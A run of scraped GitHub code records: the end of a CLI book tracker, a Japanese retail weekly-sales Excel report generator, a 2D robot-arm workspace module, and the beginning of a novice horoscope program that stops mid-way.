'l' to list all books\n- 'r' to mark a book as read\n- 'd' to delete a book\n- 'q' to quit\n\"\"\"\n\nSIMPLE_USER_CHOICE = \"\\n(a)dd, (l)ist, (r)ead, (d)elete, (q)uit\\n\"\n\n\ndef get_book_name():\n return input(\"What is the name of the book: \")\n\n\ndef get_book_info():\n name = get_book_name()\n author = input(\"Who is the author: \")\n read = input(\"Have you read this book (y/n): \")\n # could check for valid input here?\n if read == \"y\":\n read = 1\n else:\n read = 0\n\n print(read)\n return {\"name\": name, \"author\": author, \"read\": read}\n\n\ndef add_book():\n book = get_book_info()\n database.add_book(book)\n\n\ndef list_books():\n books = database.get_books()\n\n for book in books:\n book_string = f'{book[\"name\"]} was written by {book[\"author\"]}. '\n if book[\"read\"]:\n book_string = book_string + \"I have finished it.\"\n else:\n book_string = book_string + \"I have not read it yet.\"\n\n print(book_string)\n\n\ndef read_book():\n name = get_book_name()\n database.read_book(name)\n\n\ndef delete_book():\n name = get_book_name()\n database.delete_book(name)\n\n\nUSER_OPTIONS = {\n \"a\": add_book,\n \"l\": list_books,\n \"r\": read_book,\n \"d\": delete_book,\n}\n\n\ndef menu():\n database.create_book_table()\n user_input = input(USER_CHOICE)\n while user_input != \"q\":\n if user_input in USER_OPTIONS:\n USER_OPTIONS[user_input]()\n else:\n print(\"Unknown command, please try again\")\n\n user_input = input(SIMPLE_USER_CHOICE)\n\n print(\"Thanks, bye\")\n\n\nmenu()\n","repo_name":"joegurr/python-books-cli","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"18353666385","text":"from posixpath import splitext\nfrom tracemalloc import stop\nfrom PIL import Image\nimport pandas as pd\nimport openpyxl as pyxl\nimport os\nimport numpy as np\nfrom scipy import rand\n\ntenpo = [\n [\"01001008 FUN柏\",\"柏\"],\n [\"01001009 FUN千葉C-one\",\"千葉\"],\n [\"01001028 FUNスマーク伊勢崎\",\"伊勢崎\"],\n # [\"01001032 FUNララガーデン長町\",\"長町\"],\n # [\"01001033 FUNららぽーとTOKYO-BAY\",\"船橋\"],\n [\"01001034 FUNららぽーと富士見\",\"富士見\"],\n [\"01001036 FUNイオンレイクタウン\",\"レイク\"],\n [\"01001038 FUNららぽーと海老名\",\"海老名\"],\n [\"01001039 FUNイオンモールむさし村山\",\"むさし\"],\n [\"01001040 FUNららぽーと湘南平塚\",\"平塚\"],\n [\"01001041 FUNイオンモール名取\",\"名取\"],\n [\"01001042 FUNイオンモール大高\",\"大高\"],\n [\"01001043 FUNららぽーと愛知東郷\",\"東郷町\"],\n [\"01001044 FUNイオンモール太田\",\"太田\"],\n [\"01001045 FUNイオンモール水戸内原\",\"水戸\"],\n [\"01001046 FUNららぽーとEXPOCITY\",\"EXPO\"],\n [\"01001047 FUNラゾーナ川崎プラザ\",\"川崎\"],\n [\"01001048 FUNららぽーと新三郷\",\"新三郷\"],\n [\"01001049 FUNイオンモール幕張新都心\",\"幕張\"],\n [\"01001050 FUNイオンモール各務原\",\"各務原\"],\n [\"01001051 FUNららぽーと堺\",\"堺\"],\n \n]\n\ndr_files = 'C:/Users/古内翔平/OneDrive - 株式会社 TRINITY /業務会議/4⃣販売部/古内/analysis/data_folder'#今週実績\ndr_files2 = 'C:/Users/古内翔平/OneDrive - 株式会社 TRINITY /業務会議/4⃣販売部/古内/analysis/previous_data'#過去実績\ndr_files3 = 'C:/Users/古内翔平/OneDrive - 株式会社 TRINITY /業務会議/4⃣販売部/古内/analysis/sales_values'#売上集計\n\ndr_read = os.listdir(dr_files)\ndr_read2 = os.listdir(dr_files2)\ndr_read3 = os.listdir(dr_files3)\n\n\n\n#out_put_file = \"C:/Users/fun-f/Desktop/analysis/画像テスト.xlsx\"\nselectfile = os.listdir(\"C:/Users/古内翔平/OneDrive - 株式会社 TRINITY /業務会議/4⃣販売部/古内/analysis/create_file/\")\nout_put_file = os.path.join(\"C:/Users/古内翔平/OneDrive - 株式会社 TRINITY /業務会議/4⃣販売部/古内/analysis/create_file/\",selectfile[0])\n\nimg_stock = \"C:/Users/古内翔平/OneDrive - 株式会社 TRINITY /業務会議/4⃣販売部/古内/analysis/item_image_stock\"\nimg_stock_list = os.listdir(img_stock)\n\n#入荷情報リストを作成\n#<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n\n#フォルダーパス\nnew_arrival_path = \"C:/Users/古内翔平/OneDrive - 株式会社 TRINITY /業務会議/4⃣販売部/古内/analysis/new_arrival/\"\n\nnew_arrival_file = os.listdir(new_arrival_path)\nprint(new_arrival_file)\n\ncol_list = [\n \"B\",\"F\",\"J\",\"N\",\"R\",\"V\"\n]\n\nwb = pyxl.load_workbook(os.path.join(new_arrival_path,new_arrival_file[1]))\n#wb = pyxl.load_workbook(\"C:/Users/fun-f/Desktop/analysis/new_arrival/入荷予定MAP_20221115183651_1.xlsx\")\n\nsheet_name = wb.sheetnames\n#sheet_count = len(sheet_name)\n\nproject_list = []\nindex_num = [16,39,62,85,108,131,154]#85,108,131\n\nfor sheet_n in sheet_name:\n ws = wb[sheet_n]\n \n class Items:\n \n def __init__(self, name, item_cd, category_cd , producttion_number ,size):\n \n #商品名\n self.name = name\n #商品CD\n self.item_cd = item_cd\n #アイテムCD\n self.category_cd = category_cd\n #生産枚数\n self.producttion_number = producttion_number\n #サイズ\n self.size = size\n \n for index_x in index_num: \n \n for c_no in range(0,6):\n print(c_no) \n Items.name = ws[col_list[c_no] + str(index_x + 1)].value\n Items.item_cd = ws[col_list[c_no] + str(index_x)].value\n Items.category_cd = str(ws[col_list[c_no] + str(index_x)].value)[2:4]\n Items.producttion_number = ws[col_list[c_no] + str(index_x + 2)].value\n Items.size = ws[col_list[c_no] + str(index_x + 4)].value\n \n data_RC = pd.DataFrame({\"商品名\":[Items.name],\"商品CD\":[Items.item_cd],\"アイテムCD\":[Items.category_cd],\"生産枚数\":[Items.producttion_number],\"サイズ\":[Items.size]})\n \n if Items.name == None :\n print(\"None\")\n \n else: \n project_list.append(data_RC)\n \nnew_arrival_list = pd.DataFrame(pd.concat(project_list,axis=0))\n#print(new_arrival_list)\nsort_list = new_arrival_list.sort_values(\"生産枚数\",ascending=False)\n\nitem_cd_uniq = np.unique(sort_list[\"アイテムCD\"].values)\nprint(item_cd_uniq)\n\n#カテゴリー生産総枚数順に優先順位を設定\n\nproduction_rank_list = []\nfor item_n in item_cd_uniq:\n key_item = sort_list[sort_list[\"アイテムCD\"] == item_n]\n category_number = sum(key_item[\"生産枚数\"].values)\n print(category_number)\n \n data_index = pd.DataFrame({\"アイテムCD\":[item_n],\"生産枚数\":[category_number]})\n production_rank_list.append(data_index)\n \nranking_list = pd.concat(production_rank_list,axis=0).sort_values(\"生産枚数\",ascending=False).head(4) \n\nprint(ranking_list)\n\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n\nitem_category_dic = {\n \"01\":\"OP\",\n \"02\":\"CD\",\n \"03\":\"JK\",\n \"04\":\"KT\",\n \"05\":\"CS\",\n \"06\":\"CT\",\n \"07\":\"BL\",\n \"08\":\"SK\",\n \"09\":\"PT\",\n \"10\":\"TR\",\n \"11\":\"INN\",\n \"12\":\"SETUP\",\n \"13\":\"ACC\",\n \"15\":\"SHOES\",\n }\n\nimg_columns1_1 = [\"S45\"]\nimg_columns2_1 = [\"AK45\"]\nimg_columns3_1 = [\"S57\"]\nimg_columns4_1 = [\"AK57\"]\n\nimg_theme = [img_columns1_1,img_columns2_1,img_columns3_1,img_columns4_1]\n\nimg_columns1 = [\"U\",\"Y\",\"AC\",\"AG\",]\nimg_columns2 = [\"AN\",\"AR\",\"AV\",\"AZ\"]\n\nimg_columns3 = [\"U\",\"Y\",\"AC\",\"AG\",]\nimg_columns4 = [\"AN\",\"AR\",\"AV\",\"AZ\"]\n \nimg_columns = [img_columns1,img_columns2,img_columns3,img_columns4] \n\nimg_index1 = [42,43,44,52,53]\nimg_index2 = [42,43,44,52,53]\nimg_index3 = [54,55,56,65,66]\nimg_index4 = [54,55,56,65,66]\n\nimg_index_list = [img_index1,img_index2,img_index3,img_index4]\n\nbest_col = [\"T\",\"W\",\"Z\",\"AC\",\"AF\",\"AI\",\"AL\",\"AO\",\"AR\",\"AU\",\"AX\",\"BA\"]\n\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n#店別ベスト作成\n\ndata_concat_list = []\n \nfor select_i in tenpo:\n \n shop_i = select_i\n \n \n week2 = pd.read_csv('C:/Users/古内翔平/OneDrive - 株式会社 TRINITY /業務会議/4⃣販売部/古内/analysis/data_folder/' + str(shop_i[1]) + \".csv\",encoding='cp932')#ok\n \n df_week1 = pd.DataFrame(week2)\n\n print(df_week1)\n\n item_cd = pd.DataFrame(df_week1[\"商品コード\"].astype('str').str.zfill(10).values,columns=[\"商品CD\"])\n item_name = pd.DataFrame(df_week1[\"商品名\"].values,columns=[\"商品名\"])\n category_cd = pd.DataFrame(df_week1[\"商品コード\"].astype('str').str.zfill(10).str[2:4].values,columns=[\"アイテムCD\"])\n quantity = pd.DataFrame(df_week1['合計数量'].values,columns=[\"数量\"])\n amount = pd.DataFrame(df_week1['合計金額'].values,columns=[\"金額\"])\n #shop_name = pd.DataFrame([shop_i[2]],columns=[\"店舗\"])\n\n df_week1_values = pd.concat([item_cd,item_name,category_cd,quantity,amount],axis=1)\n\n filter1_df_week1_values = df_week1_values[df_week1_values[\"アイテムCD\"] != \"98\" ]\n\n filter2_df_week1_values = filter1_df_week1_values[(filter1_df_week1_values[\"商品名\"] != \"キレイマスク\") & (filter1_df_week1_values[\"商品名\"] != \"サンプル\") ]\n \n filter2_df_week1_values2 = pd.DataFrame(filter2_df_week1_values)\n \n sort_filter2_df_week1_values2 = filter2_df_week1_values2.sort_values(\"数量\",ascending=False)#★★★ 修正 ★★★\n #sort_filter2_df_week1_values3 = filter2_df_week1_values2.sort_values(\"金額\",ascending=False)#★★★ 修正 ★★★\n \n for low_data in sort_filter2_df_week1_values2.values :#★★★ 修正 ★★★\n item_cd = pd.DataFrame([low_data[0]],columns=[\"商品CD\"])\n item_name = pd.DataFrame([low_data[1]],columns=[\"商品名\"])\n category_cd = pd.DataFrame([low_data[2]],columns=[\"アイテムCD\"])\n quantity = pd.DataFrame([low_data[3]],columns=[\"数量\"])\n amount = pd.DataFrame([low_data[4]],columns=[\"金額\"])\n shop_name = pd.DataFrame([shop_i[1]],columns=[\"店舗\"])\n \n low_data2 = pd.concat([item_cd,item_name,category_cd,quantity,amount,shop_name],axis=1)\n \n data_concat_list.append(low_data2)\n \n\n all_amount = sum(filter2_df_week1_values[\"金額\"].values)\n\n op_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"01\"]\n op_1_amount = sum(op_1[\"金額\"].values)\n try :\n op_1_ratio = op_1_amount / all_amount \n \n except ZeroDivisionError:\n \n op_1_ratio = 0\n \n op_list = [op_1_amount,op_1_ratio]\n\n cd_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"02\"]\n cd_1_amount = sum(cd_1[\"金額\"].values)\n \n try:\n cd_1_ratio = cd_1_amount / all_amount \n \n except ZeroDivisionError:\n cd_1_ratio = 0\n \n cd_list = [cd_1_amount,cd_1_ratio]\n \n \n jk_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"03\"]\n jk_1_amount = sum(jk_1[\"金額\"].values)\n try:\n jk_1_ratio = jk_1_amount / all_amount \n \n except ZeroDivisionError:\n jk_1_ratio = 0\n \n jk_list = [jk_1_amount,jk_1_ratio]\n\n kt_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"04\"]\n kt_1_amount = sum(kt_1[\"金額\"].values)\n \n try :\n kt_1_ratio = kt_1_amount / all_amount \n \n except ZeroDivisionError:\n kt_1_ratio = 0\n \n kt_list = [kt_1_amount,kt_1_ratio]\n\n cs_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"05\"]\n cs_1_amount = sum(cs_1[\"金額\"].values)\n \n try :\n cs_1_ratio = cs_1_amount / all_amount \n \n except ZeroDivisionError:\n cs_1_ratio = 0\n \n cs_list = [cs_1_amount,cs_1_ratio]\n\n ct_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"06\"]\n ct_1_amount = sum(ct_1[\"金額\"].values)\n \n try:\n ct_1_ratio = ct_1_amount / all_amount \n \n except ZeroDivisionError:\n ct_1_ratio = 0\n \n ct_list = [ct_1_amount,ct_1_ratio]\n\n bl_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"07\"]\n bl_1_amount = sum(bl_1[\"金額\"].values)\n \n try :\n bl_1_ratio = bl_1_amount / all_amount \n \n except ZeroDivisionError :\n bl_1_ratio = 0\n \n bl_list = [bl_1_amount,bl_1_ratio]\n\n sk_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"08\"]\n sk_1_amount = sum(sk_1[\"金額\"].values)\n \n try :\n sk_1_ratio = sk_1_amount / all_amount \n \n except ZeroDivisionError:\n sk_1_ratio = 0\n \n sk_list = [sk_1_amount,sk_1_ratio]\n\n pt_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"09\"]\n pt_1_amount = sum(pt_1[\"金額\"].values)\n \n try :\n pt_1_ratio = pt_1_amount / all_amount \n \n except ZeroDivisionError:\n pt_1_ratio = 0\n \n pt_list = [pt_1_amount,pt_1_ratio]\n\n tr_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"10\"]\n tr_1_amount = sum(tr_1[\"金額\"].values)\n \n try :\n tr_1_ratio = tr_1_amount / all_amount \n \n except ZeroDivisionError:\n \n tr_1_ratio = 0\n \n tr_list = [tr_1_amount,tr_1_ratio]\n\n inn_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"11\"]\n inn_1_amount = sum(inn_1[\"金額\"].values)\n \n try:\n inn_1_ratio = inn_1_amount / all_amount \n \n except ZeroDivisionError:\n inn_1_ratio = 0\n \n inn_list = [inn_1_amount,inn_1_ratio]\n\n setup_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"12\"]\n setup_1_amount = sum(setup_1[\"金額\"].values)\n \n try:\n setup_1_ratio = setup_1_amount / all_amount\n \n except ZeroDivisionError:\n setup_1_ratio = 0\n \n setup_list = [setup_1_amount,setup_1_ratio]\n\n acc_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"13\"]\n acc_1_amount = sum(acc_1[\"金額\"].values)\n \n try:\n acc_1_ratio = acc_1_amount / all_amount\n \n except ZeroDivisionError:\n \n acc_1_ratio = 0\n \n acc_list = [acc_1_amount,acc_1_ratio]\n \n \n sh_1 = filter2_df_week1_values[filter2_df_week1_values[\"アイテムCD\"] == \"15\"]\n sh_1_amount = sum(sh_1[\"金額\"].values)\n \n try:\n sh_1_ratio = sh_1_amount / all_amount\n \n except ZeroDivisionError:\n \n sh_1_ratio = 0\n \n sh_list = [sh_1_amount,sh_1_ratio]\n\n out_put_list = [\n \n op_list,\n cd_list,\n jk_list,\n kt_list,\n cs_list,\n ct_list,\n bl_list,\n sk_list,\n pt_list,\n tr_list,\n inn_list,\n setup_list,\n acc_list,\n sh_list\n \n ]\n \n print(all_amount)\n\n\n \nprint(data_concat_list) \n\n#data_concat_list2 = pd.DataFrame([data_concat_list])\n\ntry :\n\n df_data_concat_list = pd.concat(data_concat_list,axis=0)\n \nexcept ValueError: \n \n item_cd = pd.DataFrame([\"\"],columns=[\"商品CD\"])\n item_name = pd.DataFrame([\"\"],columns=[\"商品名\"])\n category_cd = pd.DataFrame([\"\"],columns=[\"アイテムCD\"])\n quantity = pd.DataFrame([0],columns=[\"数量\"])\n amount = pd.DataFrame([0],columns=[\"金額\"])\n shop_name = pd.DataFrame([\"\"],columns=[\"店舗\"])\n \n low_data2 = pd.concat([item_cd,item_name,category_cd,quantity,amount,shop_name],axis=1)\n \n data_concat_list.append(low_data2)\n \n \n \n df_data_concat_list = pd.concat(data_concat_list,axis=0)\n \n \n \nprint(df_data_concat_list)\n\n\n\n#>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>\n#追加ここまで\n\nwb_out = pyxl.load_workbook(out_put_file)\n\nfor sheet_name in tenpo:\n ws_out = wb_out[sheet_name[1]] \n\n best_key = df_data_concat_list[df_data_concat_list[\"店舗\"] == sheet_name[1]].sort_values(\"金額\",ascending=False).head(12)\n\n for best_n,no_ in zip(best_key.values,range(0,13)):\n best_target = best_n[0]\n i_name = best_n[1]\n i_sales = best_n[4]\n ws_out[best_col[no_] + str(4)] = i_name\n ws_out[best_col[no_] + str(5)] = i_sales\n \n \n for img_x in img_stock_list:\n base,ext = splitext(img_x)\n \n if str(base) == str(best_target) :\n \n t_path = img_stock + \"/\" + img_x\n\n img = Image.open(t_path)\n \n re_img = img.resize((420, 600))\n \n re_img.save(t_path)\n \n best_pasting_img = pyxl.drawing.image.Image(t_path)\n \n best_pasting_img.anchor = str(best_col[no_] + str(6))#画像挿入\n \n ws_out.add_image(best_pasting_img)\n \n\n for rank_n,counter in zip(ranking_list.values,range(0,4)):\n\n \n key_2 = sort_list[sort_list[\"アイテムCD\"] == rank_n[0]].head(4)\n counter_2 = len(key_2[\"商品名\"].values)\n print(counter_2)\n ws_out[img_theme[counter][0]].value = item_category_dic[rank_n[0]]\n \n row_counter = 0\n for out_data in key_2.values:\n \n print(out_data)\n ws_out[img_columns[counter][row_counter ] + str(img_index_list[counter][0])].value = out_data[1]#品番\n ws_out[img_columns[counter][row_counter ] + str(img_index_list[counter][1])].value = out_data[0]#商品名\n ws_out[img_columns[counter][row_counter ] + str(img_index_list[counter][4])].value = out_data[3]#生産枚数\n ws_out[img_columns[counter][row_counter ] + str(img_index_list[counter][3])].value = out_data[4]#生産枚数\n target = out_data[1]\n \n\n for img_x in img_stock_list:\n base,ext = splitext(img_x)\n \n if str(base) == str(target) :\n \n t_path = img_stock + \"/\" + img_x\n\n img = Image.open(t_path)\n \n re_img = img.resize((560, 750))\n \n re_img.save(t_path)\n \n pasting_img = pyxl.drawing.image.Image(t_path)\n \n pasting_img.anchor = str(img_columns[counter][row_counter ] + str(img_index_list[counter][2]))#画像挿入\n \n ws_out.add_image(pasting_img)\n \n row_counter += 1\n \nwb_out.save(out_put_file)\n#wb_out.save(os.path.join(\"C:/Users/fun-f/Desktop/analysis\",\"週間分析1.xlsx\")) \n \n \n#<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<\n \n \n \n\n\n#img_stock = \"C:/Users/fun-f/Desktop/analysis/item_image_stock\"\n#img_stock_list = os.listdir(img_stock)\n\n#target = \"1105050180\"\n\n#for img_x in img_stock_list:\n #base,ext = splitext(img_x)\n #print(img_x)\n \n #if base == target :\n #print(\"ターゲット\",img_x)\n #t_path = img_stock + \"/\" + img_x\n\n #img = Image.open(t_path)\n \n\n \n #width = 20#19.32\n \n #height = int(img.height * width / img.width)\n \n #re_img = img.resize((width, height))\n #re_img = img.resize((610, 780))\n \n #re_img.save(t_path)\n \n #pasting_img = pyxl.drawing.image.Image(t_path)\n #pasting_img.anchor = \"B8\"\n #pasting_img.anchor = \"U56\"\n \n #ws_out.add_image(pasting_img)\n \n#wb_out.save(os.path.join(\"C:/Users/fun-f/Desktop/analysis\",\"週間分析1.xlsx\"))","repo_name":"ShouheiFuruuchi/python_space","sub_path":"weekly_analysis2/parts/parts_39_1.py","file_name":"parts_39_1.py","file_ext":"py","file_size_in_byte":16901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"21792134838","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom arm.obstacle import Obstacle\nfrom arm.goal import GoalEndPose, GoalCollection\nfrom frame2d import Frame2D\n\nclass Box(object):\n\n BOX_SIZE = 0.4\n\n def __init__(self, x, y, theta=0, name=\"box\"):\n self.obstacle = Obstacle(Frame2D(theta, x, y), Box.BOX_SIZE, Box.BOX_SIZE)\n self.frame = self.obstacle.frame\n \n ## Names are used to map between workspace and planning domain\n self.name = name\n\n @DeprecationWarning\n def get_grasp_poses(self):\n return self.get_grasp_goal()\n\n def get_grasp_goal(self):\n goals = []\n p1 = self.obstacle.frame.transform_points(np.array([0, Box.BOX_SIZE/2]))\n theta1 = -np.pi/2 + self.obstacle.frame.theta()\n goals.append(GoalEndPose(np.array([p1[0,0], p1[0,1], theta1]), 0.1))\n \n p2 = self.obstacle.frame.transform_points(np.array([0, -Box.BOX_SIZE/2]))\n theta2 = np.pi/2 + self.obstacle.frame.theta()\n goals.append(GoalEndPose(np.array([p2[0,0], p2[0,1], theta2]), 0.1))\n\n p3 = self.obstacle.frame.transform_points(np.array([Box.BOX_SIZE/2, 0]))\n theta3 = np.pi + self.obstacle.frame.theta()\n goals.append(GoalEndPose(np.array([p3[0,0], p3[0,1], theta3]), 0.1))\n \n p4 = self.obstacle.frame.transform_points(np.array([-Box.BOX_SIZE/2, 0]))\n theta4 = self.obstacle.frame.theta()\n goals.append(GoalEndPose(np.array([p4[0,0], p4[0,1], theta4]), 0.1))\n \n return GoalCollection(goals)\n\n def get_collider(self):\n return self.obstacle.get_collider()\n\n def get_position(self):\n return self.obstacle.frame.origin()\n\n def draw(self, ax, color='blue', clear=True):\n self.obstacle.draw(ax, color=color, clear=clear)\n\n def draw_grasp_poses(ax):\n grasp_poses = self.get_grasp_poses()\n for pose in grasp_poses:\n self.ax.plot([origin[0], pose[0]], [origin[1], pose[1]])\n self.ax.scatter(pose[0], pose[1])\n\nclass Area(object):\n def __init__(self, x, y, width, height, name):\n self.x = x\n self.y = y\n self.width = width\n self.height = height\n self.obstacle = Obstacle(Frame2D(0, x, y), width, height)\n self.frame = self.obstacle.frame\n self.name = name\n\n def get_collider(self):\n return self.obstacle.get_collider()\n\n def get_bounding_box(self):\n return [\n self.x - self.width/2,\n self.x + self.width/2,\n self.y - self.height/2,\n self.y + self.height/2\n ]\n\n def draw(self, ax, color='#22CC22', clear=True):\n self.obstacle.draw(ax, color=color, clear=clear)\n\nclass Workspace(object):\n\n WIDTH = 10\n HEIGHT = 10\n\n def __init__(self):\n self.boxes = []\n self.obstacles = []\n self.areas = []\n self.arm = None\n self.arm_holding = None\n\n def add_box(self, x, y, theta=0, name=None):\n if name is None:\n name = \"box{0}\".format(len(self.boxes))\n\n b = Box(x, y, theta, name)\n self.boxes.append(b)\n\n def add_obstacle(self, obstacle):\n self.obstacles.append(obstacle)\n\n def add_area(self, area, name=None):\n if name is None:\n name = \"area{0}\".format(len(self.areas))\n\n self.areas.append(area)\n\n def create_area(self, x, y, width, height):\n name = \"area{0}\".format(len(self.areas))\n area = Area(x, y, width, height, name)\n self.areas.append(area)\n return area\n\n def add_arm(self, arm):\n self.arm = arm\n\n def in_collision(self):\n if self.arm is not None:\n for o in self.obstacles:\n if self.arm.collides(o.get_collider()):\n return True\n for o in self.boxes:\n if self.arm.collides(o.get_collider()):\n return True\n\n return False\n\n def box_at(self, x, y):\n for b in self.boxes:\n if b.obstacle.point_collides(x, y):\n return b\n\n return None\n\n def area_at(self, x, y):\n for a in self.areas:\n if a.obstacle.point_collides(x, y):\n return a\n\n return None\n\n def arm_grab(self, box):\n self.boxes.remove(box)\n self.arm.grab(box)\n\n def arm_drop(self):\n box = self.arm.drop()\n if box is not None:\n self.boxes.append(box)\n\n def draw(self, ax=None, t=0):\n if ax is None:\n fig, ax = plt.subplots(figsize=(10,6))\n #fig.canvas.mpl_connect('close_event', handle_close)\n ax.set_aspect('equal')\n ax.set_xlim(-5, 5)\n ax.set_ylim(0, 8)\n\n for a in self.areas:\n a.draw(ax)\n\n for o in self.obstacles:\n o.draw(ax, color='#FF5555')\n\n for b in self.boxes:\n b.draw(ax, color='blue')\n\n if self.arm is not None:\n self.arm.draw(ax)\n\n if ax is None:\n plt.show()\n\n if t > 0:\n plt.pause(t)\n\n def draw_frame(self, ax, dt):\n if self.arm is not None:\n self.arm.draw(ax)\n\n for o in self.obstacles:\n o.draw(ax)\n\n for b in self.boxes:\n b.draw(ax)\n","repo_name":"geinarm/cmsc818_gudjon","sub_path":"workspace.py","file_name":"workspace.py","file_ext":"py","file_size_in_byte":5256,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"19637627663","text":"# Horoscope fortune teller game\n# import random\nstrength = \"\"\nweaknesses = \"\"\n\n\n# -------------------------------------------- \n\n\t# You've just learned about variables, conditionals.\n\t# Just from knowing those two topics, you can do so much!\n\t\n\t# Let's try to make a simple program that responds to the user.\n\t# We're going to recreate the Magic 8 Ball!!!\n\t\t\t\n\t\t\t# Never heard of it? That's ok!\n\n\t\t\t\t\t# You got this!\n\n # -------------------------------------------- \n\n\t# How a Magic 8 Ball Works:\n\n\t# The user asks a question and vigoriously shakes the ball. \n\t# Then the ball will respond with one of twenty responses, chosen at random. \n\n\t# That's pretty simple right?\n\n # -------------------------------------------- \n\n\t# Part 1: \n\t# Print instructions on the screen and \n\t# prompt the user to ask a question\n\n\t\n\n # --------------------------------------------\n# we are making a horoscope fortune teller thing\n\n#Aquarius\nAquariusStr=\"Progressive, original, independent, humanitarian\"\nAquariusWe=\"Runs from emotional expression, temperamental, #uncompromising, aloof\"\n\n\n#Pisces\nPiscesStr=\"Compassionate, artistic, intuitive, gentle, wise, musical\"\nPiscesWe=\"Fearful, overly trusting, sad, desire to escape reality, can be a victim or a martyr\"\n\n\n#ARIES\nAriesStr=\"Courageous, determined, confident, enthusiastic, optimistic, honest, passionate\"\nAriesWe=\"Impatient, moody, short-tempered, impulsive, aggressive\"\n\n\n#Taurus\nTaurusStr=\"Reliable, patient, practical, devoted, responsible, stable\"\nTaurusWe=\"Stubborn, possessive, uncompromising\"\n\n\n#Gemini Traits\nGeminiStr =\"Gentle, affectionate, curious, adaptable, ability to learn quickly and exchange ideas\"\nGeminiWe =\"Nervous, inconsistent, indecisive\"\n\n\n#Cancer Traits\nCancerStr =\"Tenacious, highly imaginative, loyal, emotional, sympathetic, persuasive\"\nCancerWe =\"Moody, pessimistic, suspicious, manipulative, insecure\"\n\n\n# Leo Traits\nLeoStr =\"Creative, passionate, generous, warm-hearted, cheerful, humorous\"\nLeoWe= \"Arrogant, stubborn, self-centered, lazy, inflexible\"\n\n\n# Virgo Traits\nVirgoStr= \"Loyal, analytical, kind, hardworking, practical\"\nVirgoWe=\"Shyness, worry, overly critical of self and others, all work and no play\"\n\n\n# Libra Traits\nLibraStr= \"Cooperative,diplomatic, gracious, fair-minded, social\"\nLibraWe= \"Indecisive, avoids confrontations, will carry a grudge, self-pity\"\n\n\n# Scorpio Traits\nScorpioStr = \"Strengths: Resourceful, powerful, brave, passionate, a true friend\"\nScorpioWe = \"Distrusting, jealous, manipulative, violent\"\n\n\n# Sagittarius Traits\nSagittariusStr = \"Generous, idealistic, great sense of humor\"\nSagittariusWe = \"Promises more than can deliver, very impatient, will say anything no matter how undiplomatic\"\n\n\n# Capricorn Traits\nCapricornStr = \"Responsible, disciplined, self-control, good managers\"\n\nCapricornWe = \"Know-it-all, unforgiving, condescending, expecting the worst\"\n\n\nprint(\"Do you want to find out your horoscope?\\nInput your birthday month:\")\n\nuser_month = input()\nuser_month = str(user_month)\nprint(\"Now input the day of the month you were born in:\")\n\nuser_day = input()\nuser_day = int(user_day)\n# codnitionals for the horoscope signs\n# Aries (March 21 – April 19)\n# Taurus (April 20 – May 20)\n# Gemini (May 21 – June 20)\n# Cancer (June 21 – July 22)\n# Leo (July 23 – August 22)\n# Virgo (August 23 – September 22)\n# Libra (September 23 – October 22)\n# Scorpio (October 23 – November 21)\n# Sagittarius (November 22 – December 21)\n# Capricorn (December 22 – January 19)\n# Aquarius (January 20 – February 18)\n# Pisces (February 19 – March 20)\nastrology_sign = \"\"\n# determining the astrology sign\n\n# January to June\n\nif user_month == \"January\" and user_day <= 19:\n astrology_sign = \"Capricorn\"\n strengths = CapricornStr\n weaknesses = CapricornWe\nelif user_month == \"January\" and user_day >= 20:\n astrology_sign = \"Aquarius\"\n strengths = AquariusStr\n weaknesses = AquariusWe\nelif user_month == \"January\" and user_day >= 20:\n astrology_sign = \"Aquarius\"\n strengths = AquariusStr\n weaknesses = AquariusWe\nelif user_month == \"February\" and user_day >= 19:\n astrology_sign = \"Pisces\"\n strengths = PiscesStr\n weaknesses = PiscesWe\nelif user_month == \"March\" and user_day <= 20:\n astrology_sign = \"Pisces\"\n strengths = PiscesStr\n weaknesses = PiscesWe\nelif user_month == \"March\" and user_day >= 21:\n astrology_sign = \"Aries\" \n strengths = AriesStr\n weaknesses = AriesWe\nelif user_month == \"April\" and user_day <= 19:\n astrology_sign = \"Aries\" \n strengths = AriesStr\n weaknesses = AriesWe\nelif user_month == \"April\" and user_day >= 20:\n astrology_sign = \"Taurus\"\n strengths = TaurusStr\n weaknesses = TaurusWe\nelif user_month == \"May\" and user_day <= 20:\n astrology_sign = \"Taurus\"\n strengths = TaurusStr\n weaknesses = TaurusWe \nelif user_month == \"May\" and user_day >= 19:\n astrology_sign = \"Gemini\"\n strengths = GeminiStr\n weaknesses = GeminiWe\nelif user_month == \"June\" and user_day <= 20:\n astrology_sign = \"Gemini\"\n strengths = GeminiStr\n weaknesses = GeminiWe\nelif user_month == \"June\" and user_day >= 20:\n astrology_sign = \"Cancer\"\n 